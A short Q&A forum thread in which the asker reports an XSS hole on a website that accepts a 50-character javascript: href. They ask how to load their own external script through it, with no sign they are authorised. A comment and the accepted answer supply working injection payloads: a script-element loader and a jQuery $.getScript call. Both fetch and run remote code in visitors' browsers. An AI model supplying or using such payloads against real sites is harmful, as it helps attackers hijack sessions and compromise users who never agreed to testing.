# Can you add soure of a script in a javascript

Tags: javascript, href, xss

I found a xss vulnerability on a website but it only allows `<a href=javascript:alert(1)>`.
The problem is it only accepts 50 characters.
My question : can I add source code from where I get my script in a way like `javascript:script.src=and here the source of my code`

Comment: 50 characters is very short, maybe too short for vanilla JS `d=document,d.body.appendChild(d.createElement('script')).src = ''`. Does the site use jQuery? That could make it doable

Answer (score 0, accepted):

Someone could load external script like this but it is more than 50 charackters
`let s = document.createElement("script"); s.src = "url"; document.head.appendChild(s);`

If you have JQuery the code will be smaller:
`$.getScript("url");`